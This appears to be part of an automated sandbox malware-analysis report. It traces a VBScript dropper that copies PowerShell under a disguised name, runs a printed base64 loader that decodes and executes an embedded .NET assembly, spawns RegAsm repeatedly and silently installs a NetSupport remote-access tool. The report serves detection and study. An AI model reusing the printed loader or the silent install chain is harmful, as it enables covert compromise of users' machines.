                                                                                                                      2024-11-23 01:37:14 UTC16384INData Raw: 6f 6d 6d 65 6e 74 65 64 20 6f 75 74 2e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 46 72 6f 6d 46 69 6c 65 20 3d 20 73 65 73 73 69 6f 6e 2e 50 72 6f 70 65 72 74 79 28 20 22 43 6f 6d 6d 6f 6e 46 69 6c 65 73 46 6f 6c 64 65 72 22 20 29 20 2b 20 22 4e 53 4c 5c 43 6f 6e 6e 65 63 74 69 76 69 74 79 20 53 65 72 76 65 72 5c 67 61 74 65 77 61 79 2e 64 62 22 0d 0a 54 6f 46 69 6c 65 20 3d 20 73 65 73 73 69 6f 6e 2e 50 72 6f 70 65 72 74 79 28 20 22 53 55 50 50 4f 52 54 44 49 52 22 20 29 20 2b 20 22 5c 67 61 74 65 77 61 79 2e 64 62 22 0d 0a 20 20 20 20 20 0d 0a 27 53 65 74 20 6f 62 6a 46 53 4f 20 3d 20 53 65 72 76 65 72 2e 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 53 63 72 69 16 00 01 00 31
                                                                                                                      Data Ascii: ommented out. FromFile = session.Property( "CommonFilesFolder" ) + "NSL\Connectivity Server\gateway.db"ToFile = session.Property( "SUPPORTDIR" ) + "\gateway.db" 'Set objFSO = Server.CreateObject("Scri1
                                                                                                                      2024-11-23 01:37:14 UTC16384INData Raw: 20 89 07 8d 88 00 01 00 00 3b c1 73 18 80 60 04 00 83 08 ff c6 40 05 0a 8b 0f 83 c0 08 81 c1 00 01 00 00 eb e4 83 c7 04 39 35 c0 89 40 00 7c bb eb 06 8b 35 c0 89 40 00 33 ff 85 f6 7e 46 8b 03 83 f8 ff 74 36 8a 4d 00 f6 c1 01 74 2e f6 c1 08 75 0b 50 ff 15 40 50 40 00 85 c0 74 1e 8b c7 8b cf c1 f8 05 83 e1 1f 8b 04 85 c0 88 40 00 8d 04 c8 8b 0b 89 08 8a 4d 00 88 48 04 47 45 83 c3 04 3b fe 7c ba 33 db a1 c0 88 40 00 83 3c d8 ff 8d 34 d8 75 4d 85 db c6 46 04 81 75 05 6a f6 58 eb 0a 8b c3 48 f7 d8 1b c0 83 c0 f5 50 ff 15 3c 50 40 00 8b f8 83 ff ff 74 17 57 ff 15 40 50 40 00 85 c0 74 0c 25 ff 00 00 00 89 3e 83 f8 02 75 06 80 4e 04 40 eb 0f 83 f8 03 75 0a 80 4e 04 08 eb 04 80 4e 04 80 43 83 fb 03 7c 9b ff 35 c0 89 40 00 ff 15 38 50 40 00 5f 5e 5d 5b 83 c4 44 c3
                                                                                                                      Data Ascii: ;s`@95@|5@3~Ft6Mt.uP@P@t@MHGE;|3@<4uMFujXHP<P@tW@P@t%>uN@uNNC|5@8P@_^][D
                                                                                                                      2024-11-23 01:37:15 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                      Data Ascii:
                                                                                                                      2024-11-23 01:37:15 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                      Data Ascii:
                                                                                                                      2024-11-23 01:37:15 UTC16384INData Raw: 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 55 55 56 ff 50 50 51 ff 77 77 78 ff 86 8a 90 ff 93 6e 45 ff c9 82 33 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 7f 35 ff c0 7c 31 ff ef dd ca ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff f9 f2 ea ff c7 88 42 ff c1 7d 32 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2 80 36 ff c2
                                                                                                                      Data Ascii: VUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVUUVPPQwwxnE36666666666666666665|1B}266666


                                                                                                                      Statistics

                                                                                                                      CPU Usage

                                                                                                                      Click to jump to process

                                                                                                                      Memory Usage

                                                                                                                      Click to jump to process

                                                                                                                      High Level Behavior Distribution

                                                                                                                      Click to dive into process behavior distribution

                                                                                                                      Behavior

                                                                                                                      Click to jump to process

                                                                                                                      System Behavior

                                                                                                                      General

                                                                                                                      Target ID:0
                                                                                                                      Start time:20:37:01
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\System32\wscript.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pyyidau.vbs"
                                                                                                                      Imagebase:0x7ff6bea90000
                                                                                                                      File size:170'496 bytes
                                                                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:1
                                                                                                                      Start time:20:37:02
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\Pyyidau.vbs.exe" /Y
                                                                                                                      Imagebase:0x7ff758890000
                                                                                                                      File size:289'792 bytes
                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:2
                                                                                                                      Start time:20:37:02
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:3
                                                                                                                      Start time:20:37:04
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Users\user\Desktop\Pyyidau.vbs.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\Pyyidau.vbs.exe" -enc JABBAHEAdwB3AHMAYwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQAuAFIAZQBwAGwAYQBjAGUAKAAnAC4AZQB4AGUAJwAsACcAJwApADsAJABHAHkAaQBlAHAAZwBrAHcAdgByACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQAQQBxAHcAdwBzAGMAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEcAeQBpAGUAcABnAGsAdwB2AHIALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEkAdwBxAGIAdwBjACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAIAAsACAAJABYAHMAbABtAHcAbQBvAHEAZwBrAHoAIAApADsAJABFAG0AYgBtAGUAcwBqAHMAbAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQAUgB3AHAAdQB4AHcAYQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABJAHcAcQBiAHcAYwAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAUgB3AHAAdQB4AHcAYQAuAEMAbwBwAHkAVABvACgAIAAkAEUAbQBiAG0AZQBzAGoAcwBsACAAKQA7ACQAUgB3AHAAdQB4AHcAYQAuAEMAbABvAHMAZQAoACkAOwAkAEkAdwBxAGIAdwBjAC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgACQARQBtAGIAbQBlAHMAagBzAGwALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAFgAcwBsAG0AdwBtAG8AcQBnAGsAegApADsAIAAkAE4AZgBrAGYAZwB0AHQAcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABoAHIAZQBhAGQAaQBuAGcALgBUAGgAcgBlAGEAZABdADoAOgBHAGUAdABEAG8AbQBhAGkAbgAoACkALgBMAG8AYQBkACgAJABYAHMAbABtAHcAbQBvAHEAZwBrAHoAKQA7ACAAJABBAHYAZgBuAHgAdQBrAG4AcgBtAG0AIAA9ACAAJABOAGYAawBmAGcAdAB0AHIALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABBAHYAZgBuAHgAdQBrAG4AcgBtAG0ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAEEAdgBmAG4AeAB1AGsAbgByAG0AbQAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=
                                                                                                                      Imagebase:0x270000
                                                                                                                      File size:433'152 bytes
                                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.1883031177.000000000BB10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.1825322765.0000000004AD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:4
                                                                                                                      Start time:20:37:04
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:5
                                                                                                                      Start time:20:37:06
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\50d669f573135aafd57c..vbs"
                                                                                                                      Imagebase:0x820000
                                                                                                                      File size:147'456 bytes
                                                                                                                      MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000003.2439151550.0000000008DD0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000003.2456677584.0000000005E63000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000003.2453934056.000000000B614000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000003.2454210130.000000000B614000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000003.2454210130.000000000B656000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000003.2439151550.0000000008FC0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:6
                                                                                                                      Start time:20:37:07
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                      Imagebase:0x10000
                                                                                                                      File size:65'440 bytes
                                                                                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:7
                                                                                                                      Start time:20:37:07
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                      Imagebase:0x700000
                                                                                                                      File size:65'440 bytes
                                                                                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:8
                                                                                                                      Start time:20:37:07
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                      Imagebase:0x770000
                                                                                                                      File size:65'440 bytes
                                                                                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:9
                                                                                                                      Start time:20:37:08
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                      Imagebase:0x2f0000
                                                                                                                      File size:65'440 bytes
                                                                                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:10
                                                                                                                      Start time:20:37:08
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                      Imagebase:0xac0000
                                                                                                                      File size:65'440 bytes
                                                                                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:11
                                                                                                                      Start time:20:37:08
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                      Imagebase:0x610000
                                                                                                                      File size:65'440 bytes
                                                                                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:12
                                                                                                                      Start time:20:37:09
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                      Imagebase:0x970000
                                                                                                                      File size:65'440 bytes
                                                                                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:13
                                                                                                                      Start time:20:37:09
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                      Imagebase:0x340000
                                                                                                                      File size:65'440 bytes
                                                                                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:14
                                                                                                                      Start time:20:37:09
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                      Imagebase:0xab0000
                                                                                                                      File size:65'440 bytes
                                                                                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:15
                                                                                                                      Start time:20:37:10
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                      Imagebase:0x900000
                                                                                                                      File size:65'440 bytes
                                                                                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:21
                                                                                                                      Start time:20:38:20
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\vrep.msi" /quiet
                                                                                                                      Imagebase:0x6a0000
                                                                                                                      File size:59'904 bytes
                                                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000015.00000003.2485822412.0000000003086000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000015.00000003.2484709944.00000000030C2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000015.00000003.2484886914.00000000030C2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000015.00000003.2484627970.00000000030C2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:22
                                                                                                                      Start time:20:38:21
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\System32\msiexec.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                      Imagebase:0x7ff7a1480000
                                                                                                                      File size:69'632 bytes
                                                                                                                      MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:false

                                                                                                                      General

                                                                                                                      Target ID:24
                                                                                                                      Start time:20:38:23
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 19326FA0C651FB2486638441C45D4A3A
                                                                                                                      Imagebase:0x6a0000
                                                                                                                      File size:59'904 bytes
                                                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:25
                                                                                                                      Start time:20:38:25
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:cmd.exe /c ATTRIB -R "C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic"
                                                                                                                      Imagebase:0x7ff758890000
                                                                                                                      File size:289'792 bytes
                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:26
                                                                                                                      Start time:20:38:25
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:27
                                                                                                                      Start time:20:38:25
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\SysWOW64\attrib.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:ATTRIB -R "C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic"
                                                                                                                      Imagebase:0xdd0000
                                                                                                                      File size:19'456 bytes
                                                                                                                      MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:28
                                                                                                                      Start time:20:38:26
                                                                                                                      Start date:22/11/2024
                                                                                                                      Path:C:\Windows\Installer\MSI264F.tmp
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Windows\Installer\MSI264F.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EU
                                                                                                                      Imagebase:0xae0000
                                                                                                                      File size:763'872 bytes
                                                                                                                      MD5 hash:0FCF65C63E08E77732224B2D5D959F13
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
